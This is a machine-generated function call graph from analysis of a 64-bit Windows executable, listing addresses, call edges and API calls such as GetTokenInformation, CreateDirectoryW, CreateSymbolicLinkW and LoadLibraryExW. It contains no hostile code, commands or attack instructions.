17239->17250 17243 7ff61e8f1f60 38 API calls 17240->17243 17240->17251 17241->17229 17244 7ff61e8f3670 17241->17244 17245 7ff61e8f43c0 47 API calls 17242->17245 17242->17251 17243->17250 17247 7ff61e8f4558 37 API calls 17244->17247 17244->17251 17245->17250 17246 7ff61e8ec550 _log10_special 8 API calls 17248 7ff61e8f3983 17246->17248 17247->17250 17248->17194 17249 7ff61e8fe858 47 API calls 17249->17250 17250->17249 17250->17251 17251->17246 17303 7ff61e8f0d14 17252->17303 17256 7ff61e8f3f26 17255->17256 17257 7ff61e8f0b80 12 API calls 17256->17257 17258 7ff61e8f3f6e 17257->17258 17259 7ff61e8fe570 46 API calls 17258->17259 17261 7ff61e8f4041 17259->17261 17260 7ff61e8f4063 17262 7ff61e8f40ec 17260->17262 17264 7ff61e8f47c0 45 API calls 17260->17264 17261->17260 17263 7ff61e8f47c0 45 API calls 17261->17263 17262->17220 17263->17260 17264->17262 17266 7ff61e8f4440 17265->17266 17267 7ff61e8f43d8 17265->17267 17266->17220 17267->17266 17268 7ff61e8fe858 47 API calls 17267->17268 17268->17266 17271 7ff61e8f1b83 17269->17271 17270 7ff61e8f1bb2 17272 7ff61e8f0b80 12 API calls 17270->17272 17275 7ff61e8f1bef 17270->17275 17271->17270 17273 7ff61e8f1c6f 17271->17273 17272->17275 17274 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17273->17274 17274->17275 17275->17220 17277 7ff61e8f1773 17276->17277 17278 7ff61e8f17a2 17277->17278 17280 7ff61e8f185f 17277->17280 17279 7ff61e8f0b80 12 API calls 17278->17279 17282 7ff61e8f17df 17278->17282 17279->17282 17281 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17280->17281 17281->17282 17282->17220 17284 7ff61e8f1f93 17283->17284 17285 7ff61e8f1fc2 17284->17285 17287 7ff61e8f207f 17284->17287 17286 7ff61e8f0b80 12 API calls 17285->17286 17289 7ff61e8f1fff 17285->17289 17286->17289 17288 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17287->17288 17288->17289 17289->17220 17291 7ff61e8fe880 17290->17291 17292 7ff61e8fe8c5 17291->17292 17293 7ff61e8f47c0 45 API calls 17291->17293 17297 7ff61e8fe885 __scrt_get_show_window_mode 17291->17297 17299 7ff61e8fe8ae __scrt_get_show_window_mode 17291->17299 17292->17297 17292->17299 17300 7ff61e9007e8 17292->17300 17293->17292 17294 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17294->17297 17297->17220 17299->17294 17299->17297 17302 7ff61e90080c WideCharToMultiByte 17300->17302 17304 7ff61e8f0d53 17303->17304 17305 7ff61e8f0d41 17303->17305 17308 7ff61e8f0d60 17304->17308 17312 7ff61e8f0d9d 17304->17312 17306 7ff61e8f4f08 _get_daylight 11 API calls 17305->17306 17307 7ff61e8f0d46 17306->17307 17309 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17307->17309 17310 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17308->17310 17317 7ff61e8f0d51 17309->17317 17310->17317 17311 7ff61e8f0e46 17313 7ff61e8f4f08 _get_daylight 11 API calls 17311->17313 17311->17317 17312->17311 17314 7ff61e8f4f08 _get_daylight 11 API calls 17312->17314 17316 7ff61e8f0ef0 17313->17316 17315 7ff61e8f0e3b 17314->17315 17318 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17315->17318 17319 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17316->17319 17317->17194 17318->17311 17319->17317 17325 7ff61e8fec3d 17320->17325 17321 7ff61e8fec42 17322 7ff61e8f51dd 17321->17322 17323 7ff61e8f4f08 _get_daylight 11 API calls 17321->17323 17322->17169 17322->17171 17324 7ff61e8fec4c 17323->17324 17326 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17324->17326 17325->17321 17325->17322 17327 7ff61e8fec8c 17325->17327 17326->17322 17327->17322 17328 7ff61e8f4f08 _get_daylight 11 API calls 17327->17328 17328->17324 17330 7ff61e8e8633 __vcrt_freefls 17329->17330 17331 7ff61e8e85b1 GetTokenInformation 17329->17331 17334 7ff61e8e864c 17330->17334 17335 7ff61e8e8646 CloseHandle 17330->17335 17332 7ff61e8e85d2 GetLastError 17331->17332 17333 7ff61e8e85dd 17331->17333 17332->17330 17332->17333 17333->17330 17336 7ff61e8e85f9 GetTokenInformation 17333->17336 17334->16461 17335->17334 17336->17330 17337 7ff61e8e861c 17336->17337 17337->17330 17338 7ff61e8e8626 ConvertSidToStringSidW 17337->17338 17338->17330 17340 7ff61e8ec850 17339->17340 17341 7ff61e8e2b74 GetCurrentProcessId 17340->17341 17342 7ff61e8e26b0 48 API calls 17341->17342 17343 7ff61e8e2bc7 17342->17343 17344 7ff61e8f4bd8 48 API calls 17343->17344 17345 7ff61e8e2c10 MessageBoxW 17344->17345 17346 7ff61e8ec550 _log10_special 8 API calls 17345->17346 17347 7ff61e8e2c40 17346->17347 17347->16471 17349 7ff61e8e25e5 17348->17349 17350 7ff61e8f4bd8 48 API calls 17349->17350 17351 7ff61e8e2604 17350->17351 17351->16486 17397 7ff61e8f8794 17352->17397 17356 7ff61e8e81dc 17355->17356 17357 7ff61e8e9390 2 API calls 17356->17357 17358 7ff61e8e81fb 17357->17358 17359 7ff61e8e8203 17358->17359 17360 7ff61e8e8216 ExpandEnvironmentStringsW 17358->17360 17361 7ff61e8e2810 49 API calls 17359->17361 17362 7ff61e8e823c __vcrt_freefls 17360->17362 17363 7ff61e8e820f __vcrt_freefls 17361->17363 17364 7ff61e8e8253 17362->17364 17365 7ff61e8e8240 17362->17365 17366 7ff61e8ec550 _log10_special 8 API calls 17363->17366 17369 7ff61e8e8261 GetDriveTypeW 17364->17369 17370 7ff61e8e82bf 17364->17370 17367 7ff61e8e2810 49 API calls 17365->17367 17368 7ff61e8e83af 17366->17368 17367->17363 17368->16485 17387 7ff61e8f8238 17368->17387 17373 7ff61e8e8295 17369->17373 17374 7ff61e8e82b0 17369->17374 17535 7ff61e8f7e08 17370->17535 17376 7ff61e8e2810 49 API calls 17373->17376 17528 7ff61e8f796c 17374->17528 17375 7ff61e8e82d1 17378 7ff61e8e82d9 17375->17378 17385 7ff61e8e82ec 17375->17385 17376->17363 17379 7ff61e8e2810 49 API calls 17378->17379 17379->17363 17380 7ff61e8e834e CreateDirectoryW 17380->17363 17382 7ff61e8e835d GetLastError 17380->17382 17381 7ff61e8e26b0 48 API calls 17383 7ff61e8e8328 CreateDirectoryW 17381->17383 17382->17363 17384 7ff61e8e836a GetLastError 17382->17384 17383->17385 17386 7ff61e8e2c50 51 API calls 17384->17386 17385->17380 17385->17381 17386->17363 17388 7ff61e8f8245 17387->17388 17389 7ff61e8f8258 17387->17389 17391 7ff61e8f4f08 _get_daylight 11 API calls 17388->17391 17636 7ff61e8f7ebc 17389->17636 17393 7ff61e8f824a 17391->17393 17395 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17393->17395 17394 7ff61e8f8256 17394->16489 17395->17394 17438 7ff61e901558 17397->17438 17497 7ff61e9012d0 17438->17497 17518 7ff61e9002d8 EnterCriticalSection 17497->17518 17529 7ff61e8f798a 17528->17529 17532 7ff61e8f79bd 17528->17532 17529->17532 17547 7ff61e900474 17529->17547 17532->17363 17533 7ff61e8fa900 _isindst 17 API calls 17534 7ff61e8f79ed 17533->17534 17536 7ff61e8f7e24 17535->17536 17537 7ff61e8f7e92 17535->17537 17536->17537 17539 7ff61e8f7e29 17536->17539 17581 7ff61e9007c0 17537->17581 17540 7ff61e8f7e41 17539->17540 17541 7ff61e8f7e5e 17539->17541 17556 7ff61e8f7bd8 GetFullPathNameW 17540->17556 17564 7ff61e8f7c4c GetFullPathNameW 17541->17564 17546 7ff61e8f7e56 __vcrt_freefls 17546->17375 17548 7ff61e900481 17547->17548 17549 7ff61e90048b 17547->17549 17548->17549 17554 7ff61e9004a7 17548->17554 17550 7ff61e8f4f08 _get_daylight 11 API calls 17549->17550 17551 7ff61e900493 17550->17551 17552 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17551->17552 17553 7ff61e8f79b9 17552->17553 17553->17532 17553->17533 17554->17553 17555 7ff61e8f4f08 _get_daylight 11 API calls 17554->17555 17555->17551 17557 7ff61e8f7c14 17556->17557 17558 7ff61e8f7bfe GetLastError 17556->17558 17561 7ff61e8f4f08 _get_daylight 11 API calls 17557->17561 17563 7ff61e8f7c10 17557->17563 17559 7ff61e8f4e7c _fread_nolock 11 API calls 17558->17559 17560 7ff61e8f7c0b 17559->17560 17562 7ff61e8f4f08 _get_daylight 11 API calls 17560->17562 17561->17563 17562->17563 17563->17546 17565 7ff61e8f7c7f GetLastError 17564->17565 17569 7ff61e8f7c95 __vcrt_freefls 17564->17569 17566 7ff61e8f4e7c _fread_nolock 11 API calls 17565->17566 17567 7ff61e8f7c8c 17566->17567 17568 7ff61e8f4f08 _get_daylight 11 API calls 17567->17568 17570 7ff61e8f7c91 17568->17570 17569->17570 17571 7ff61e8f7cef GetFullPathNameW 17569->17571 17572 7ff61e8f7d24 17570->17572 17571->17565 17571->17570 17573 7ff61e8f7d98 memcpy_s 17572->17573 17575 7ff61e8f7d4d __scrt_get_show_window_mode 17572->17575 17573->17546 17574 7ff61e8f7d81 17576 7ff61e8f4f08 _get_daylight 11 API calls 17574->17576 17575->17573 17575->17574 17578 7ff61e8f7dba 17575->17578 17577 7ff61e8f7d86 17576->17577 17579 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17577->17579 17578->17573 17580 7ff61e8f4f08 _get_daylight 11 API calls 17578->17580 17579->17573 17580->17577 17584 7ff61e9005d0 17581->17584 17585 7ff61e900612 17584->17585 17586 7ff61e9005fb 17584->17586 17588 7ff61e900637 17585->17588 17589 7ff61e900616 17585->17589 17587 7ff61e8f4f08 _get_daylight 11 API calls 17586->17587 17591 7ff61e900600 17587->17591 17622 7ff61e8ff5b8 17588->17622 17610 7ff61e90073c 17589->17610 17595 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17591->17595 17593 7ff61e90063c 17599 7ff61e9006e1 17593->17599 17605 7ff61e900663 17593->17605 17609 7ff61e90060b __vcrt_freefls 17595->17609 17596 7ff61e90061f 17597 7ff61e8f4ee8 _fread_nolock 11 API calls 17596->17597 17598 7ff61e900624 17597->17598 17599->17586 17602 7ff61e9006e9 17599->17602 17600 7ff61e8ec550 _log10_special 8 API calls 17603 7ff61e900731 17600->17603 17604 7ff61e8f7bd8 13 API calls 17602->17604 17603->17546 17604->17609 17606 7ff61e8f7c4c 14 API calls 17605->17606 17607 7ff61e9006a7 17606->17607 17607->17609 17609->17600 17611 7ff61e900786 17610->17611 17612 7ff61e900756 17610->17612 17613 7ff61e900791 GetDriveTypeW 17611->17613 17614 7ff61e900771 17611->17614 17615 7ff61e8f4ee8 _fread_nolock 11 API calls 17612->17615 17613->17614 17618 7ff61e8ec550 _log10_special 8 API calls 17614->17618 17616 7ff61e90075b 17615->17616 17617 7ff61e8f4f08 _get_daylight 11 API calls 17616->17617 17619 7ff61e900766 17617->17619 17620 7ff61e90061b 17618->17620 17621 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17619->17621 17620->17593 17620->17596 17621->17614 17623 7ff61e90a4d0 __scrt_get_show_window_mode 17622->17623 17624 7ff61e8ff5ee GetCurrentDirectoryW 17623->17624 17625 7ff61e8ff605 17624->17625 17626 7ff61e8ff62c 17624->17626 17628 7ff61e8ec550 _log10_special 8 API calls 17625->17628 17627 7ff61e8feb98 _get_daylight 11 API calls 17626->17627 17629 7ff61e8ff63b 17627->17629 17630 7ff61e8ff699 17628->17630 17631 7ff61e8ff645 GetCurrentDirectoryW 17629->17631 17632 7ff61e8ff654 17629->17632 17630->17593 17631->17632 17634 7ff61e8ff659 17631->17634 17633 7ff61e8f4f08 _get_daylight 11 API calls 17632->17633 17633->17634 17635 7ff61e8fa948 __free_lconv_num 11 API calls 17634->17635 17635->17625 17643 7ff61e9002d8 EnterCriticalSection 17636->17643 17645 7ff61e8e456a 17644->17645 17646 7ff61e8e9390 2 API calls 17645->17646 17647 7ff61e8e458f 17646->17647 17648 7ff61e8ec550 _log10_special 8 API calls 17647->17648 17649 7ff61e8e45b7 17648->17649 17649->16524 17651 7ff61e8e7e2e 17650->17651 17652 7ff61e8e7f52 17651->17652 17653 7ff61e8e1c80 49 API calls 17651->17653 17654 7ff61e8ec550 _log10_special 8 API calls 17652->17654 17657 7ff61e8e7eb5 17653->17657 17655 7ff61e8e7f83 17654->17655 17655->16524 17656 7ff61e8e1c80 49 API calls 17656->17657 17657->17652 17657->17656 17658 7ff61e8e4560 10 API calls 17657->17658 17659 7ff61e8e9390 2 API calls 17657->17659 17658->17657 17660 7ff61e8e7f23 CreateDirectoryW 17659->17660 17660->17652 17660->17657 17662 7ff61e8e1613 17661->17662 17663 7ff61e8e1637 17661->17663 17782 7ff61e8e1050 17662->17782 17664 7ff61e8e45c0 108 API calls 17663->17664 17666 7ff61e8e164b 17664->17666 17669 7ff61e8e1653 17666->17669 17670 7ff61e8e1682 17666->17670 17667 7ff61e8e1618 17668 7ff61e8e162e 17667->17668 17671 7ff61e8e2710 54 API calls 17667->17671 17668->16524 17672 7ff61e8f4f08 _get_daylight 11 API calls 17669->17672 17673 7ff61e8e45c0 108 API calls 17670->17673 17671->17668 17674 7ff61e8e1658 17672->17674 17675 7ff61e8e1696 17673->17675 17676 7ff61e8e2910 54 API calls 17674->17676 17677 7ff61e8e169e 17675->17677 17678 7ff61e8e16b8 17675->17678 17680 7ff61e8e1671 17676->17680 17681 7ff61e8e2710 54 API calls 17677->17681 17679 7ff61e8f06d4 73 API calls 17678->17679 17683 7ff61e8e16cd 17679->17683 17680->16524 17682 7ff61e8e16ae 17681->17682 17686 7ff61e8f004c 74 API calls 17682->17686 17684 7ff61e8e16d1 17683->17684 17685 7ff61e8e16f9 17683->17685 17687 7ff61e8f4f08 _get_daylight 11 API calls 17684->17687 17688 7ff61e8e16ff 17685->17688 17689 7ff61e8e1717 17685->17689 17690 7ff61e8e1829 17686->17690 17691 7ff61e8e16d6 17687->17691 17760 7ff61e8e1210 17688->17760 17694 7ff61e8e1739 17689->17694 17705 7ff61e8e1761 17689->17705 17690->16524 17693 7ff61e8e2910 54 API calls 17691->17693 17700 7ff61e8e16ef __vcrt_freefls 17693->17700 17695 7ff61e8f4f08 _get_daylight 11 API calls 17694->17695 17697 7ff61e8e173e 17695->17697 17696 7ff61e8f004c 74 API calls 17696->17682 17698 7ff61e8e2910 54 API calls 17697->17698 17698->17700 17699 7ff61e8f039c _fread_nolock 53 API calls 17699->17705 17700->17696 17701 7ff61e8e17da 17702 7ff61e8f4f08 _get_daylight 11 API calls 17701->17702 17704 7ff61e8e17ca 17702->17704 17708 7ff61e8e2910 54 API calls 17704->17708 17705->17699 17705->17700 17705->17701 17706 7ff61e8e17c5 17705->17706 17813 7ff61e8f0adc 17705->17813 17707 7ff61e8f4f08 _get_daylight 11 API calls 17706->17707 17707->17704 17708->17700 17710 7ff61e8e718b 17709->17710 17712 7ff61e8e7144 17709->17712 17710->16524 17712->17710 17846 7ff61e8f5024 17712->17846 17714 7ff61e8e41a1 17713->17714 17715 7ff61e8e44e0 49 API calls 17714->17715 17716 7ff61e8e41db 17715->17716 17717 7ff61e8e44e0 49 API calls 17716->17717 17718 7ff61e8e41eb 17717->17718 17719 7ff61e8e420d 17718->17719 17720 7ff61e8e423c 17718->17720 17877 7ff61e8e4110 17719->17877 17721 7ff61e8e4110 51 API calls 17720->17721 17723 7ff61e8e423a 17721->17723 17724 7ff61e8e429c 17723->17724 17725 7ff61e8e4267 17723->17725 17727 7ff61e8e4110 51 API calls 17724->17727 17884 7ff61e8e7cf0 17725->17884 17729 7ff61e8e42c0 17727->17729 17732 7ff61e8e4110 51 API calls 17729->17732 17738 7ff61e8e4312 17729->17738 17730 7ff61e8e4393 17733 7ff61e8e1950 115 API calls 17730->17733 17731 7ff61e8e2710 54 API calls 17735 7ff61e8e4297 17731->17735 17736 7ff61e8e42e9 17732->17736 17737 7ff61e8e439d 17733->17737 17734 7ff61e8ec550 _log10_special 8 API calls 17739 7ff61e8e4435 17734->17739 17735->17734 17736->17738 17740 7ff61e8e4110 51 API calls 17736->17740 17741 7ff61e8e43a5 17737->17741 17742 7ff61e8e43fe 17737->17742 17738->17730 17744 7ff61e8e438c 17738->17744 17746 7ff61e8e4317 17738->17746 17748 7ff61e8e437b 17738->17748 17739->16524 17740->17738 17910 7ff61e8e1840 17741->17910 17743 7ff61e8e2710 54 API calls 17742->17743 17743->17746 17744->17741 17744->17746 17749 7ff61e8e2710 54 API calls 17746->17749 17752 7ff61e8e2710 54 API calls 17748->17752 17749->17735 17750 7ff61e8e43d2 17754 7ff61e8e1600 118 API calls 17750->17754 17751 7ff61e8e43bc 17753 7ff61e8e2710 54 API calls 17751->17753 17752->17746 17753->17735 17755 7ff61e8e43e0 17754->17755 17755->17735 17756 7ff61e8e2710 54 API calls 17755->17756 17756->17735 17758 7ff61e8e1c80 49 API calls 17757->17758 17759 7ff61e8e4474 17758->17759 17759->16524 17761 7ff61e8e1268 17760->17761 17762 7ff61e8e126f 17761->17762 17765 7ff61e8e1297 17761->17765 17763 7ff61e8e2710 54 API calls 17762->17763 17764 7ff61e8e1282 17763->17764 17764->17700 17766 7ff61e8e12d4 17765->17766 17767 7ff61e8e12b1 17765->17767 17771 7ff61e8e12e6 17766->17771 17780 7ff61e8e1309 memcpy_s 17766->17780 17768 7ff61e8f4f08 _get_daylight 11 API calls 17767->17768 17769 7ff61e8e12b6 17768->17769 17770 7ff61e8e2910 54 API calls 17769->17770 17776 7ff61e8e12cf __vcrt_freefls 17770->17776 17772 7ff61e8f4f08 _get_daylight 11 API calls 17771->17772 17773 7ff61e8e12eb 17772->17773 17775 7ff61e8e2910 54 API calls 17773->17775 17774 7ff61e8f039c _fread_nolock 53 API calls 17774->17780 17775->17776 17776->17700 17777 7ff61e8e13cf 17778 7ff61e8e2710 54 API calls 17777->17778 17778->17776 17779 7ff61e8f0adc 76 API calls 17779->17780 17780->17774 17780->17776 17780->17777 17780->17779 17781 7ff61e8f0110 37 API calls 17780->17781 17781->17780 17783 7ff61e8e45c0 108 API calls 17782->17783 17784 7ff61e8e108c 17783->17784 17785 7ff61e8e1094 17784->17785 17786 7ff61e8e10a9 17784->17786 17788 7ff61e8e2710 54 API calls 17785->17788 17787 7ff61e8f06d4 73 API calls 17786->17787 17789 7ff61e8e10bf 17787->17789 17794 7ff61e8e10a4 __vcrt_freefls 17788->17794 17790 7ff61e8e10c3 17789->17790 17791 7ff61e8e10e6 17789->17791 17792 7ff61e8f4f08 _get_daylight 11 API calls 17790->17792 17796 7ff61e8e1122 17791->17796 17797 7ff61e8e10f7 17791->17797 17793 7ff61e8e10c8 17792->17793 17795 7ff61e8e2910 54 API calls 17793->17795 17794->17667 17812 7ff61e8e10e1 __vcrt_freefls 17795->17812 17798 7ff61e8e113c 17796->17798 17799 7ff61e8e1129 17796->17799 17800 7ff61e8f4f08 _get_daylight 11 API calls 17797->17800 17806 7ff61e8f039c _fread_nolock 53 API calls 17798->17806 17808 7ff61e8e11ed 17798->17808 17798->17812 17801 7ff61e8e1210 92 API calls 17799->17801 17802 7ff61e8e1100 17800->17802 17801->17812 17804 7ff61e8e2910 54 API calls 17802->17804 17803 7ff61e8f004c 74 API calls 17805 7ff61e8e11b4 17803->17805 17804->17812 17805->17794 17817 7ff61e8e46f0 17805->17817 17806->17798 17809 7ff61e8f4f08 _get_daylight 11 API calls 17808->17809 17810 7ff61e8e11f2 17809->17810 17811 7ff61e8e2910 54 API calls 17810->17811 17811->17812 17812->17803 17814 7ff61e8f0b0c 17813->17814 17831 7ff61e8f082c 17814->17831 17816 7ff61e8f0b2a 17816->17705 17818 7ff61e8e4700 17817->17818 17819 7ff61e8e9390 2 API calls 17818->17819 17820 7ff61e8e472b 17819->17820 17821 7ff61e8e9390 2 API calls 17820->17821 17827 7ff61e8e479e 17820->17827 17823 7ff61e8e4746 17821->17823 17822 7ff61e8ec550 _log10_special 8 API calls 17824 7ff61e8e47b9 17822->17824 17825 7ff61e8e474b CreateSymbolicLinkW 17823->17825 17823->17827 17824->17794 17826 7ff61e8e4775 17825->17826 17825->17827 17826->17827 17828 7ff61e8e477e GetLastError 17826->17828 17827->17822 17828->17827 17829 7ff61e8e4789 17828->17829 17830 7ff61e8e46f0 10 API calls 17829->17830 17830->17827 17832 7ff61e8f084c 17831->17832 17837 7ff61e8f0879 17831->17837 17833 7ff61e8f0881 17832->17833 17834 7ff61e8f0856 17832->17834 17832->17837 17838 7ff61e8f076c 17833->17838 17835 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17834->17835 17835->17837 17837->17816 17845 7ff61e8f546c EnterCriticalSection 17838->17845 17847 7ff61e8f5031 17846->17847 17848 7ff61e8f505e 17846->17848 17849 7ff61e8f4f08 _get_daylight 11 API calls 17847->17849 17856 7ff61e8f4fe8 17847->17856 17850 7ff61e8f5081 17848->17850 17851 7ff61e8f509d 17848->17851 17852 7ff61e8f503b 17849->17852 17853 7ff61e8f4f08 _get_daylight 11 API calls 17850->17853 17861 7ff61e8f4f4c 17851->17861 17855 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17852->17855 17857 7ff61e8f5086 17853->17857 17858 7ff61e8f5046 17855->17858 17856->17712 17859 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17857->17859 17858->17712 17860 7ff61e8f5091 17859->17860 17860->17712 17862 7ff61e8f4f70 17861->17862 17868 7ff61e8f4f6b 17861->17868 17863 7ff61e8fb150 __CxxCallCatchBlock 45 API calls 17862->17863 17862->17868 17864 7ff61e8f4f8b 17863->17864 17869 7ff61e8fd984 17864->17869 17868->17860 17870 7ff61e8f4fae 17869->17870 17871 7ff61e8fd999 17869->17871 17873 7ff61e8fd9f0 17870->17873 17871->17870 17872 7ff61e903304 45 API calls 17871->17872 17872->17870 17874 7ff61e8fda05 17873->17874 17875 7ff61e8fda18 17873->17875 17874->17875 17876 7ff61e902650 45 API calls 17874->17876 17875->17868 17876->17875 17878 7ff61e8e4136 17877->17878 17879 7ff61e8f4984 49 API calls 17878->17879 17880 7ff61e8e415c 17879->17880 17881 7ff61e8e416d 17880->17881 17882 7ff61e8e4560 10 API calls 17880->17882 17881->17723 17883 7ff61e8e417f 17882->17883 17883->17723 17885 7ff61e8e7d05 17884->17885 17886 7ff61e8e45c0 108 API calls 17885->17886 17887 7ff61e8e7d2b 17886->17887 17888 7ff61e8e7d52 17887->17888 17889 7ff61e8e45c0 108 API calls 17887->17889 17891 7ff61e8ec550 _log10_special 8 API calls 17888->17891 17890 7ff61e8e7d42 17889->17890 17892 7ff61e8e7d4d 17890->17892 17893 7ff61e8e7d5c 17890->17893 17894 7ff61e8e4277 17891->17894 17895 7ff61e8f004c 74 API calls 17892->17895 17914 7ff61e8f00e4 17893->17914 17894->17731 17894->17735 17895->17888 17897 7ff61e8e7dbf 17898 7ff61e8f004c 74 API calls 17897->17898 17900 7ff61e8e7de7 17898->17900 17899 7ff61e8f039c _fread_nolock 53 API calls 17908 7ff61e8e7d61 17899->17908 17901 7ff61e8f004c 74 API calls 17900->17901 17901->17888 17902 7ff61e8e7dc6 17904 7ff61e8f0110 37 API calls 17902->17904 17903 7ff61e8f0adc 76 API calls 17903->17908 17905 7ff61e8e7dc1 17904->17905 17905->17897 17920 7ff61e8f7318 17905->17920 17906 7ff61e8f0110 37 API calls 17906->17908 17908->17897 17908->17899 17908->17902 17908->17903 17908->17905 17908->17906 17909 7ff61e8f00e4 37 API calls 17908->17909 17909->17908 17912 7ff61e8e18d5 17910->17912 17913 7ff61e8e1865 17910->17913 17911 7ff61e8f5024 45 API calls 17911->17913 17912->17750 17912->17751 17913->17911 17913->17912 17915 7ff61e8f00ed 17914->17915 17917 7ff61e8f00fd 17914->17917 17916 7ff61e8f4f08 _get_daylight 11 API calls 17915->17916 17918 7ff61e8f00f2 17916->17918 17917->17908 17919 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17918->17919 17919->17917 17921 7ff61e8f7320 17920->17921 17922 7ff61e8f733c 17921->17922 17923 7ff61e8f735d 17921->17923 17925 7ff61e8f4f08 _get_daylight 11 API calls 17922->17925 17939 7ff61e8f546c EnterCriticalSection 17923->17939 17927 7ff61e8f7341 17925->17927 17941 7ff61e8f5ec8 17940->17941 17942 7ff61e8f5eee 17941->17942 17945 7ff61e8f5f21 17941->17945 17943 7ff61e8f4f08 _get_daylight 11 API calls 17942->17943 17944 7ff61e8f5ef3 17943->17944 17946 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17944->17946 17947 7ff61e8f5f34 17945->17947 17948 7ff61e8f5f27 17945->17948 17949 7ff61e8e4616 17946->17949 17959 7ff61e8fac28 17947->17959 17950 7ff61e8f4f08 _get_daylight 11 API calls 17948->17950 17949->16549 17950->17949 17972 7ff61e9002d8 EnterCriticalSection 17959->17972 18332 7ff61e8f78f8 18331->18332 18335 7ff61e8f73d4 18332->18335 18334 7ff61e8f7911 18334->16559 18336 7ff61e8f741e 18335->18336 18337 7ff61e8f73ef 18335->18337 18345 7ff61e8f546c EnterCriticalSection 18336->18345 18338 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 18337->18338 18340 7ff61e8f740f 18338->18340 18340->18334 18347 7ff61e8efe43 18346->18347 18348 7ff61e8efe71 18346->18348 18349 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 18347->18349 18355 7ff61e8efe63 18348->18355 18356 7ff61e8f546c EnterCriticalSection 18348->18356 18349->18355 18355->16563 18358 7ff61e8e45c0 108 API calls 18357->18358 18359 7ff61e8e1493 18358->18359 18360 7ff61e8e149b 18359->18360 18361 7ff61e8e14bc 18359->18361 18363 7ff61e8e2710 54 API calls 18360->18363 18362 7ff61e8f06d4 73 API calls 18361->18362 18364 7ff61e8e14d1 18362->18364 18365 7ff61e8e14ab 18363->18365 18366 7ff61e8e14d5 18364->18366 18367 7ff61e8e14f8 18364->18367 18365->16596 18368 7ff61e8f4f08 _get_daylight 11 API calls 18366->18368 18371 7ff61e8e1532 18367->18371 18372 7ff61e8e1508 18367->18372 18369 7ff61e8e14da 18368->18369 18370 7ff61e8e2910 54 API calls 18369->18370 18378 7ff61e8e14f3 __vcrt_freefls 18370->18378 18373 7ff61e8e1538 18371->18373 18382 7ff61e8e154b 18371->18382 18374 7ff61e8f4f08 _get_daylight 11 API calls 18372->18374 18375 7ff61e8e1210 92 API calls 18373->18375 18376 7ff61e8e1510 18374->18376 18375->18378 18379 7ff61e8e2910 54 API calls 18376->18379 18377 7ff61e8f004c 74 API calls 18380 7ff61e8e15c4 18377->18380 18378->18377 18379->18378 18380->16596 18381 7ff61e8f039c _fread_nolock 53 API calls 18381->18382 18382->18378 18382->18381 18383 7ff61e8e15d6 18382->18383 18384 7ff61e8f4f08 _get_daylight 11 API calls 18383->18384 18385 7ff61e8e15db 18384->18385 18386 7ff61e8e2910 54 API calls 18385->18386 18386->18378 18388 7ff61e8e9390 2 API calls 18387->18388 18389 7ff61e8e8e94 LoadLibraryExW 18388->18389 18390 7ff61e8e8eb3 __vcrt_freefls 18389->18390 18390->16630 18392 7ff61e8e771b GetProcAddress 18391->18392 18393 7ff61e8e76e9 GetLastError 18391->18393 18464 7ff61e8e6375 18463->18464 18465 7ff61e8e1c80 49 API calls 18464->18465 18466 7ff61e8e63b1 18465->18466 18467 7ff61e8e63ba 18466->18467 18468 7ff61e8e63dd 18466->18468 18469 7ff61e8e2710 54 API calls 18467->18469 18470 7ff61e8e4630 49 API calls 18468->18470 18471 7ff61e8e63d3 18469->18471 18472 7ff61e8e63f5 18470->18472 18476 7ff61e8ec550 _log10_special 8 API calls 18471->18476 18473 7ff61e8e6413 18472->18473 18474 7ff61e8e2710 54 API calls 18472->18474 18475 7ff61e8e4560 10 API calls 18473->18475 18474->18473 18478 7ff61e8e641d 18475->18478 18477 7ff61e8e336e 18476->18477 18477->16665 18494 7ff61e8e6500 18477->18494 18479 7ff61e8e642b 18478->18479 18480 7ff61e8e8e80 3 API calls 18478->18480 18481 7ff61e8e4630 49 API calls 18479->18481 18480->18479 18482 7ff61e8e6444 18481->18482 18483 7ff61e8e6469 18482->18483 18484 7ff61e8e6449 18482->18484 18486 7ff61e8e8e80 3 API calls 18483->18486 18485 7ff61e8e2710 54 API calls 18484->18485 18485->18471 18487 7ff61e8e6476 18486->18487 18488 7ff61e8e6482 18487->18488 18489 7ff61e8e64c1 18487->18489 18490 7ff61e8e9390 2 API calls 18488->18490 18553 7ff61e8e5830 GetProcAddress 18489->18553 18492 7ff61e8e649a GetLastError 18490->18492 18493 7ff61e8e2c50 51 API calls 18492->18493 18493->18471 18643 7ff61e8e5400 18494->18643 18496 7ff61e8e6526 18497 7ff61e8e653f 18496->18497 18498 7ff61e8e652e 18496->18498 18650 7ff61e8e4c90 18497->18650 18499 7ff61e8e2710 54 API calls 18498->18499 18505 7ff61e8e653a 18499->18505 18502 7ff61e8e654b 18504 7ff61e8e2710 54 API calls 18502->18504 18503 7ff61e8e655c 18506 7ff61e8e656c 18503->18506 18508 7ff61e8e657d 18503->18508 18504->18505 18505->16667 18507 7ff61e8e2710 54 API calls 18506->18507 18507->18505 18509 7ff61e8e65ad 18508->18509 18510 7ff61e8e659c 18508->18510 18512 7ff61e8e65cd 18509->18512 18513 7ff61e8e65bc 18509->18513 18511 7ff61e8e2710 54 API calls 18510->18511 18511->18505 18654 7ff61e8e4d50 18512->18654 18514 7ff61e8e2710 54 API calls 18513->18514 18514->18505 18532 7ff61e8e6070 18531->18532 18532->18532 18533 7ff61e8e6099 